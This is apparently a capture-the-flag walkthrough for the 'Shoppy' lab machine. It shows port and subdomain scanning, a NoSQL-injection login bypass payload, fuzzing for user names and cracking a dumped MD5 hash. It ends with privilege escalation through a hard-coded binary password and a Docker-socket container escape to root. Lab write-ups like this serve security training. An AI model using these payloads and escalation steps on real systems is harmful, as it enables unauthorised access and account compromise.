Scanning

> TARGET=10.129.180.36 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Shoppy Wait Page
|_http-favicon: Unknown favicon MD5: D5F0A0ADD0BFBB2BC51607F78ECE2F57
|_http-server-header: nginx/1.23.1
9093/tcp open  copycat? syn-ack ttl 63
  • Discovered the hostname shoppy.htb by browsing the site; add it to /etc/hosts.

Web enum

  • Subdomain enum
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://shoppy.htb/" -H "Host: FUZZ.shoppy.htb" --hl 7

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000047340:   200        0 L      141 W      3122 Ch     "mattermost" 
  • There is a login page at http://shoppy.htb/login; it can be bypassed by logging in with the following username (any password works):
admin'||''==='
  • Fuzz the username field with the same bypass to find more valid accounts (--hh 51 hides the failed-login response):
> wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -d "username=FUZZ'||''==='&password=test" --hh 51 http://shoppy.htb/login

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   302        0 L      4 W        28 Ch       "josh"
  • Also noted an unidentified page at http://shoppy.htb:9093/ (the port nmap flagged as copycat?).

Get josh's hash

  • Log in as josh using the same bypass:
josh'||''==='
  • Search for the user josh in the admin panel and export the result; the export contains the password hash:
http://shoppy.htb/admin/search-users?username=josh
http://shoppy.htb/exports/export-search.json

[{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]
  • The hash is unsalted MD5 (hashcat mode 0) and cracks against rockyou:
> hashcat -m 0 hash.txt rockyou.txt
remembermethisway

Foothold

  • Log in to http://mattermost.shoppy.htb with josh's credentials and browse the Development channel, where the following message to a user called jaeger appears:
Hey @jaeger, when I was trying to install docker on the machine, I started learn C++ and I do a password manager. You can test it if you want, the program is on the deploy machine.
  • Then, in the Deploy channel, the password for jaeger can be found:
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it. 
  • Log in via SSH as jaeger and grab the user flag.

Root

  • Check sudo rights: jaeger may run a password-manager binary as the deploy user.
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager
  • Look at the printable strings inside the binary: the hard-coded master password ("Sample") sits right after the prompt text.
> cat /home/deploy/password-manager

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
  • Run the program as deploy, enter that master password to obtain deploy's credentials, and switch to deploy:
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
  • Upload linpeas: it reports the Docker socket as writable, and the deploy user is a member of the docker group, so a container with the host filesystem mounted gives root.
[+] Analyzing .socket files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)
Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)
deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)